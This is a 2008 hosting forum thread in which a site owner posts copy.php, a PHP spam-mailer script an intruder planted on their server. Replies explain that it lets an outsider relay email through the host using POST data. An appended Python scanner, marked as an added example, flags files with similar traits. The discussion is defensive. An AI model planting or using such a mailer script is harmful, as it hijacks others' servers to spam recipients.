copy.php on my host

jeanius
Forum Newbie
Posts: 2
Joined: Sat Nov 29, 2008 6:48 am

copy.php on my host

Post by jeanius »

Hi there!
I am having an interesting experience as I have just received back my host information from someone that hacked into my browser logs. I noticed a few new files on my host. And this is one of them:

copy.php

Code:

<?
///////////////////////GET ENV//////////////////////////////////////////////////
if (isset($_POST['action']))
    {
    $action=$_POST['action'];
    }
else
 {
 print "<h1>Under construction!!!</h1>";
 exit;
 }
 
if ($action=="test")
 {
 print "test_ok";
 exit;
 }
 
if ($action=="send")
 {
  $from             = $_POST['from'];
  $subject          = $_POST['subject'];
  $message          = $_POST['message'];
  $emaillist        = $_POST['emaillist'];
  $random_mail      = $_POST['random_mail'];
  $random_name      = $_POST['random_name'];
  $realname         = $_POST['realname'];
  $replyto          = $_POST['replyto'];
  $random_reply     = $_POST['random_reply'];
  $subject          = $_POST['subject'];
  $random_sabj      = $_POST['random_sabj'];
  $mailfilename     = $_POST['mailfilename'];
  $mails_from_file  = $_POST['mails_from_file'];
  $log_to_file      = $_POST['log_to_file'];
//////////////////////CHECK DATA////////////////////////////////////////////////
 
////////////////////////////////////////////////////////////////////////////////
    $to = ereg_replace(" ", "", $to);
    $message = ereg_replace("&email&", $to, $message);
    $subject = ereg_replace("&email&", $to, $subject);
 
    $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
    $header .= "MIME-Version: 1.0\r\n";
/*    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
    If ($file_name) $header .= "--$uid\r\n";*/
    $header .= "Content-Type: text/$contenttype; Charset=windows-1251\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= "$message\r\n";
/*    If ($file_name) $header .= "--$uid\r\n";
    If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
    If ($file_name) $header .= "$content\r\n";
    If ($file_name) $header .= "--$uid--";*/
    mail($to, $subject, "", $header);
print "ok";
}
?>
Could anyone tell me what this is made to perform?

Thanks 8)
pkbruker
Forum Commoner
Posts: 32
Joined: Sun Aug 03, 2008 9:36 am
Location: Oslo, Norway

Re: copy.php on my host

Post by pkbruker »

This script enables the outside "hacker" to use the server your site is on to send e-mails, probably spam. You REALLY should delete this file.

This is how it works:
By sending the correct URL to your site (i.e. "copy.php?action=send&from=myemail@thedomain.com...") the server your site is on will, based on the contents of the URL, send an e-mail.
mmj
Forum Contributor
Posts: 118
Joined: Fri Oct 31, 2008 4:00 pm

Re: copy.php on my host

Post by mmj »

pkbruker wrote: This script enables the outside "hacker" to use the server your site is on to send e-mails, probably spam. You REALLY should delete this file.

This is how it works:
By sending the correct URL to your site (i.e. "copy.php?action=send&from=myemail@thedomain.com...") the server your site is on will, based on the contents of the URL, send an e-mail.

Not exactly true, it would have to be POST data.

@OP:

Looks like a poorly written php mail script.
jeanius
Forum Newbie
Posts: 2
Joined: Sat Nov 29, 2008 6:48 am

Re: copy.php on my host

Post by jeanius »

Thank you for your quick responses!

Is there any way to search for malicious codes/files? My host is using cPanel.

I have many domains and subdirectories on it. So it's kind of hard to pick out what files I'm not supposed to have..
mmj
Forum Contributor
Posts: 118
Joined: Fri Oct 31, 2008 4:00 pm

Re: copy.php on my host

Post by mmj »

jeanius wrote: Thank you for your quick responses!

Is there any way to search for malicious codes/files? My host is using cPanel.

I have many domains and subdirectories on it. So it's kind of hard to pick out what files I'm not supposed to have..

A bit vague, but no, not really possible.
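
For the question above about searching a host for files like copy.php, an added example that is not part of the thread: a Python scanner that walks a web root and flags PHP files sharing the traits of the copy.php sample (sender, recipient and body taken from the request and passed to mail()). The indicator set, the two-hit threshold, the extension list and the sample strings are assumptions made for this example.

```python
import os
import re
import sys

# Indicators modelled on the copy.php sample in this thread; thresholds are assumptions.
REQ_KEY = re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[\s*['\"](\w+)['\"]\s*\]")
MAIL_CALL = re.compile(r"(?<![\w$>:])mail\s*\(", re.IGNORECASE)
DYN_FROM = re.compile(r"From:[^\\\"'\n]*\$\w+", re.IGNORECASE)
ENVELOPE_KEYS = {"from", "replyto", "realname", "emaillist", "to", "subject", "message"}
PHP_EXTS = (".php", ".phtml", ".php5", ".inc")

# Constructed samples: lines abridged from copy.php above, and a benign contact form.
SAMPLE_MAILER = r'''<?
  $from = $_POST['from'];
  $message = $_POST['message'];
  $emaillist = $_POST['emaillist'];
  $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  mail($to, $subject, "", $header);'''
SAMPLE_CONTACT = r'''<?php
$body = strip_tags($_POST['message']);
mail('owner@example.com', 'Contact form', $body, "From: noreply@example.com\r\n");'''

def indicators(source):
    """Return the names of the mailer indicators present in one PHP source string."""
    keys = {k.lower() for k in REQ_KEY.findall(source)}
    checks = [
        ("mail() called in a file that reads request parameters", bool(MAIL_CALL.search(source) and keys)),
        ("sender, recipient or body fields read from the request (3+)", len(keys & ENVELOPE_KEYS) >= 3),
        ("From: header built from a variable", bool(DYN_FROM.search(source))),
    ]
    return [name for name, hit in checks if hit]

def scan_tree(root, min_hits=2):
    """Walk root and return {path: [indicators]} for PHP files with >= min_hits."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(PHP_EXTS)):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="latin-1") as fh:
                    hits = indicators(fh.read(1_000_000))  # cap the bytes read per file
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            if len(hits) >= min_hits:
                flagged[path] = hits
    return flagged

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, hits)
```

A flagged file is a lead for manual review; a legitimate contact form that sets its own recipient and From: address scores one indicator and is not reported.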